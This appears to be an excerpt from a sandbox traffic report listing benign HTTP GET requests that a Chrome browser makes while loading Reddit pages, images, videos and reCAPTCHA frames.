Source: global trafficHTTP traffic detected: GET /n84r7411wfj01_t5_3hx3r/murder HTTP/1.1Host: emoji.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hifk3f9kte391_t5_2qo4s/nba-1 HTTP/1.1Host: emoji.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5prqaz6ytjo81_t5_5tdqj0/Pikachu HTTP/1.1Host: emoji.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLSPlaylist.m3u8?f=hd%2ChlsTrimLow%2ChlsSpecOrder2&v=1&a=1747936515%2CNTI1YzFlZGYwNmYxNWU2ZGZlYTc3YTNhNDU0MmFhMGZkNWE0OTdjNWUwNGZmNjM5MWU5YTYxYWZlNDcxOGE4MQ%3D%3D HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"CMCD-Object: ot=mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36CMCD-Session: cid="m1lypa16y7we1",sf=h,sid="acda2db8-2299-486c-b972-814495665bfd"CMCD-Request: mtp=500,susec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /otf6hliftw5d1_t5_2qp7h/discord HTTP/1.1Host: emoji.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /someone-found-this-awesome-mini-world-inside-a-tree-while-v0-Y3oydXNrY2o5ZXdlMfix98AlLO_iyTaOJ2u1luds-G8NQwgaL5-12Qab8lUN.png?width=640&crop=smart&format=pjpg&auto=webp&s=7070f7b90d51708b582792227af4ae2a1ddcadc1 HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/anchor?ar=1&k=6LcZL1spAAAAAIzQl_DXGakd-J2uwjnfZas9G-Rj&co=aHR0cHM6Ly93d3cucmVkZGl0LmNvbTo0NDM.&hl=en&v=w0_qmZVSdoaCDsP7iM_WT86D&size=invisible&cb=mzmsb4vbyjow HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/anchor?ar=1&k=6LfirrMoAAAAAHZOipvza4kpp_VtTwLNuXVwURNQ&co=aHR0cHM6Ly93d3cucmVkZGl0LmNvbTo0NDM.&hl=en&v=w0_qmZVSdoaCDsP7iM_WT86D&size=invisible&cb=ff82que7xqi6 HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /recaptcha/enterprise/anchor?ar=1&k=6LcZL1spAAAAAIzQl_DXGakd-J2uwjnfZas9G-Rj&co=aHR0cHM6Ly93d3cucmVkZGl0LmNvbTo0NDM.&hl=en&v=w0_qmZVSdoaCDsP7iM_WT86D&theme=light&size=normal&sa=login_with_external_identity&cb=qjf4vz5kqao HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Browser-Channel: stableX-Browser-Year: 2025X-Browser-Validation: wTKGXmLo+sPWz1JKKbFzUyHly1Q=X-Browser-Copyright: Copyright 2025 Google LLC. All rights reserved.X-Client-Data: CLbgygE=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /9ypx1kyfihid1_t5_2qh3l/News HTTP/1.1Host: emoji.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /this-dude-flying-in-a-jet-powered-wingsuit-right-next-to-v0-dzh2aW00NHhjZHdlMX9ZHEjl_kA6jpIN7Jjh6YhexHlQWfYdTa5nVe2ZUGgD.png?width=640&crop=smart&format=pjpg&auto=webp&s=ac2101f1fa921252010609c06f16c41fec88323d HTTP/1.1Host: external-preview.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad1td4bx9ezz_t5_3nqvj/upvote HTTP/1.1Host: emoji.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/wholsome_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /n84r7411wfj01_t5_3hx3r/murder HTTP/1.1Host: emoji.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/popcorn_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/hehehe_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /hifk3f9kte391_t5_2qo4s/nba-1 HTTP/1.1Host: emoji.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /otf6hliftw5d1_t5_2qp7h/discord HTTP/1.1Host: emoji.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2uqcm/styles/communityIcon_kfqpkjbvpv001.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=871296ce8664f6ad7c584164a1c901a823641c56 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /5prqaz6ytjo81_t5_5tdqj0/Pikachu HTTP/1.1Host: emoji.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_4vxm7y/styles/communityIcon_lvb1b3wl4er71.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=d0295cf902e37807ec57a1d34aef71928be2c863 HTTP/1.1Host: styles.redditmedia.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/bravo_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /snoovatar/snoo_assets/marketing/lol_40.png HTTP/1.1Host: i.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLSPlaylist.m3u8?f=hd%2ChlsTrimLow%2ChlsSpecOrder2&v=1&a=1747936515%2CNTI1YzFlZGYwNmYxNWU2ZGZlYTc3YTNhNDU0MmFhMGZkNWE0OTdjNWUwNGZmNjM5MWU5YTYxYWZlNDcxOGE4MQ%3D%3D HTTP/1.1Host: v.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ad1td4bx9ezz_t5_3nqvj/upvote HTTP/1.1Host: emoji.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/wholsome_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/hehehe_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/popcorn_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_2uqcm/styles/communityIcon_kfqpkjbvpv001.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=871296ce8664f6ad7c584164a1c901a823641c56 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_480.m3u8 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"CMCD-Object: ot=mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36CMCD-Session: cid="m1lypa16y7we1",sf=h,sid="acda2db8-2299-486c-b972-814495665bfd"CMCD-Request: mtp=2000,susec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /maga-why-does-it-bother-you-so-much-to-be-called-a-n-zi-v0-gjjgh5785bwe1.jpeg?width=320&crop=smart&auto=webp&s=e801759d9fbf801535fb7400978abc18a0457a45 HTTP/1.1Host: preview.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /m1lypa16y7we1/HLS_AUDIO_128.m3u8 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"CMCD-Object: ot=mUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36CMCD-Session: cid="m1lypa16y7we1",sf=h,sid="acda2db8-2299-486c-b972-814495665bfd"CMCD-Request: mtp=2000,susec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://www.reddit.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.reddit.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /t5_4vxm7y/styles/communityIcon_lvb1b3wl4er71.png?width=48&height=48&frame=1&auto=webp&crop=48:48,smart&s=d0295cf902e37807ec57a1d34aef71928be2c863 HTTP/1.1Host: styles.redditmedia.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /gghizx1x0fwe1/DASH_96.mp4 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /lol7miz99bwe1/DASH_96.mp4 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /marketplace-assets/v1/core/awards/bravo_v1_40.png HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /snoovatar/snoo_assets/marketing/lol_40.png HTTP/1.1Host: i.redd.itConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /r8xshhw8ldwe1/DASH_96.mp4 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
Source: global trafficHTTP traffic detected: GET /6klug8cbkdwe1/DASH_96.mp4 HTTP/1.1Host: v.redd.itConnection: keep-alivesec-ch-ua-platform: "Windows"Accept-Encoding: identity;q=1, *;q=0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: videoSec-Fetch-Storage-Access: activeReferer: https://www.reddit.com/Accept-Language: en-US,en;q=0.9Range: bytes=0-
